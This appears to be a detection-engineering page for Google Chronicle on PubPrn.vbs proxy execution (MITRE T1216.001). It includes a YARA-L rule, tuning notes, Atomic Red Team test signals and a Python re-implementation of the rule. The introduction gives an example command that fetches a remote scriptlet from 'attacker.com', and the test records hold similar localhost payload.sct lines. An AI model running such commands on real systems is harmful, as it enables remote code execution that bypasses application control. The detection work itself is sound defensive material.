Detect PubPrn in Google Chronicle
Adversaries may abuse PubPrn.vbs to proxy execution of malicious remote scriptlet files. PubPrn.vbs is a Microsoft-signed Visual Basic Script located at C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs that is designed to publish printers to Active Directory Domain Services. Because the script is signed by Microsoft, it can be used to bypass application control solutions that trust Microsoft-signed code. Adversaries pass a script: URI scheme as the second parameter (e.g., pubprn.vbs 127.0.0.1 script:https://attacker.com/payload.sct) to fetch and execute a remote COM scriptlet (.sct) file via scrobj.dll. The script is typically invoked via cscript.exe or wscript.exe. Windows 10 and later versions restrict the second parameter to LDAP:// URIs, mitigating the remote code execution vector on patched systems; however, legacy environments and custom scripts may remain vulnerable.
MITRE ATT&CK
- Tactic: Defense Evasion
- Technique: T1216 System Script Proxy Execution
- Sub-technique: T1216.001 PubPrn
- Canonical reference: https://attack.mitre.org/techniques/T1216/001/
YARA-L Detection Query
rule t1216_001_pubprn_proxy_execution {
  meta:
    author = "Detection Engineering"
    description = "Detects PubPrn.vbs proxy execution (T1216.001) via script: URI moniker or .sct COM scriptlet reference in cscript.exe or wscript.exe command line"
    mitre_attack_tactic = "Defense Evasion"
    mitre_attack_technique = "T1216.001"
    mitre_attack_url = "https://attack.mitre.org/techniques/T1216/001/"
    severity = "HIGH"
    priority = "HIGH"

  events:
    $e.metadata.event_type = "PROCESS_LAUNCH"
    $e.target.process.file.full_path = /(?i)(cscript|wscript)\.exe$/
    $e.target.process.command_line = /(?i)pubprn/
    (
      $e.target.process.command_line = /(?i)script:/ or
      $e.target.process.command_line = /(?i)\.sct/
    )
    // The match section groups on a placeholder variable, so bind the hostname here
    $host = $e.principal.hostname

  match:
    $host over 1h

  outcome:
    // Composite score: highest per-event sum of the three command-line indicators in the window
    $risk_score = max(
      if($e.target.process.command_line = /(?i)script:/, 40, 0) +
      if($e.target.process.command_line = /(?i)https?:\/\//, 35, 0) +
      if($e.target.process.command_line = /(?i)\.sct/, 25, 0)
    )
    $hostname = array_distinct($e.principal.hostname)
    $username = array_distinct($e.principal.user.userid)
    $command_line = array_distinct($e.target.process.command_line)
    $parent_process = array_distinct($e.principal.process.file.full_path)
    $event_count = count_distinct($e.metadata.id)

  condition:
    $e
}

Detects PubPrn.vbs proxy execution (T1216.001) in Google Chronicle using YARA-L 2.0 UDM events. Matches PROCESS_LAUNCH events where cscript.exe or wscript.exe is executed with pubprn in the command line alongside a script: URI moniker or .sct COM scriptlet reference. Computes a composite risk score and aggregates events per hostname over a 1-hour window.
False Positives & Tuning
- Authorized printer provisioning scripts running under service accounts in domain environments — validate principal.user.userid against known service account inventory
- Red team or penetration testing engagements that exercise PubPrn LOLBin as part of a defined test window — correlate with authorized testing schedules
- Custom enterprise VBScript wrappers that call pubprn.vbs with programmatically constructed command lines for printer fleet management — cross-reference with change management records and parent process tree
Testing Methodology
Validate this detection against the four Atomic Red Team tests for T1216.001. Each test below lists the behaviour to exercise and the telemetry you should expect to see.
- Test 1: PubPrn Script Moniker Proxy Execution via HTTP
Expected signal: Sysmon Event ID 1: Process Create with Image=cscript.exe, CommandLine containing 'pubprn.vbs' and 'script:http://127.0.0.1:8080/payload.sct'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8080 from cscript.exe. Security Event ID 4688 with the same command line if audit policy is enabled. Sysmon Event ID 7: scrobj.dll may be loaded if script: URI processing is initiated before the connection fails.
- Test 2: PubPrn Execution via HTTPS with .sct Extension
Expected signal: Sysmon Event ID 1: Process Create with CommandLine containing 'pubprn.vbs', 'script:', 'https://', and '.sct'. Sysmon Event ID 22: DNS query attempt for 'localhost' from cscript.exe. Sysmon Event ID 3: Network connection attempt on port 443. Security Event ID 4688 if command line auditing is enabled.
- Test 3: PubPrn via wscript.exe Instead of cscript.exe
Expected signal: Sysmon Event ID 1: Process Create with Image=wscript.exe (NOT cscript.exe), CommandLine containing 'pubprn.vbs' and 'script:http://'. Sysmon Event ID 3: Connection attempt to 127.0.0.1:9999. No console window spawned (wscript behaviour). Security Event ID 4688 with full command line if auditing is enabled.
- Test 4: PubPrn Invocation from cmd.exe Parent (Simulated Phishing Chain)
Expected signal: Sysmon Event ID 1 (cmd.exe): Process Create for cmd.exe with /c argument. Sysmon Event ID 1 (cscript.exe): Process Create with ParentImage=cmd.exe, CommandLine containing 'pubprn.vbs script:http://'. Two Security Event ID 4688 entries, one per process creation. Parent-child chain: cmd.exe -> cscript.exe visible in EDR process tree.
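As an added example (not part of the original page or its detection package), the following Python re-implements the rule's events, match and outcome logic from the YARA-L section above and runs it over constructed process-launch records shaped like the Atomic test signals, so the scoring and per-host grouping can be checked offline before the rule is deployed. The record layout, hostnames, user names and the fixed one-hour bucketing (in place of YARA-L's sliding window) are assumptions.

```python
import re
from collections import defaultdict, namedtuple

# Predicates taken from the rule's events: and outcome: sections.
IMAGE_RE = re.compile(r"(?i)(cscript|wscript)\.exe$")
PUBPRN_RE, MONIKER_RE = re.compile(r"(?i)pubprn"), re.compile(r"(?i)script:")
HTTP_RE, SCT_RE = re.compile(r"(?i)https?://"), re.compile(r"(?i)\.sct")

# Constructed stand-in for the UDM fields the rule reads (ts = epoch seconds).
Launch = namedtuple("Launch", "event_id ts hostname userid parent_path target_path command_line")

def events_section(ev):
    """True when a PROCESS_LAUNCH record satisfies every predicate in the events: block."""
    cl = ev.command_line
    return (IMAGE_RE.search(ev.target_path) is not None
            and PUBPRN_RE.search(cl) is not None
            and bool(MONIKER_RE.search(cl) or SCT_RE.search(cl)))

def event_risk(cl):
    """Per-event sum inside the rule's max(...): script: 40, http(s):// 35, .sct 25."""
    return sum(w for rx, w in ((MONIKER_RE, 40), (HTTP_RE, 35), (SCT_RE, 25)) if rx.search(cl))

def run_rule(events, window=3600):
    """Groups matching events per hostname in fixed 1h buckets (a simplification of
    YARA-L's sliding 'over 1h' window) and builds the rule's outcome variables."""
    groups = defaultdict(list)
    for ev in filter(events_section, events):
        groups[(ev.hostname, ev.ts // window)].append(ev)
    return [{
        "hostname": host,
        "risk_score": max(event_risk(e.command_line) for e in evs),  # max() of per-event sums
        "username": sorted({e.userid for e in evs}),                 # array_distinct(...)
        "parent_process": sorted({e.parent_path for e in evs}),
        "event_count": len({e.event_id for e in evs}),               # count_distinct(metadata.id)
    } for (host, _), evs in groups.items()]

PUBPRN = r"C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs"
SYS32 = r"C:\Windows\System32"
# Constructed events mirroring Atomic tests 1, 4 and 3 above, plus a benign LDAP:// publish.
SAMPLE_EVENTS = [
    Launch("e1", 1000, "ws01", "jdoe", r"C:\Windows\explorer.exe", SYS32 + r"\cscript.exe",
           f"cscript.exe {PUBPRN} 127.0.0.1 script:http://127.0.0.1:8080/payload.sct"),
    Launch("e2", 1300, "ws01", "jdoe", SYS32 + r"\cmd.exe", SYS32 + r"\cscript.exe",
           f"cscript.exe {PUBPRN} 127.0.0.1 script:http://127.0.0.1:8080/payload.sct"),
    Launch("e3", 2000, "ws02", "asmith", r"C:\Windows\explorer.exe", SYS32 + r"\wscript.exe",
           f"wscript.exe {PUBPRN} 127.0.0.1 script:http://127.0.0.1:9999/"),
    Launch("e4", 2500, "prn01", "svc_print", SYS32 + r"\cmd.exe", SYS32 + r"\cscript.exe",
           f"cscript.exe {PUBPRN} prn01 LDAP://CN=Printers,DC=corp,DC=example"),
]
```

Calling `run_rule(SAMPLE_EVENTS)` yields two detections: ws01 scores 100 with both parents and two events in one window, ws02 scores 75 (no .sct), and the LDAP:// publish on prn01 never enters the events section, which is the false-positive boundary the tuning notes describe.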
References (8)
- https://attack.mitre.org/techniques/T1216/001/
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn
- https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md
- https://lolbas-project.github.io/lolbas/Scripts/Pubprn/
- https://twitter.com/ItsReallyNick/status/966359744379621376
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-deviceprocessevents-table
- https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon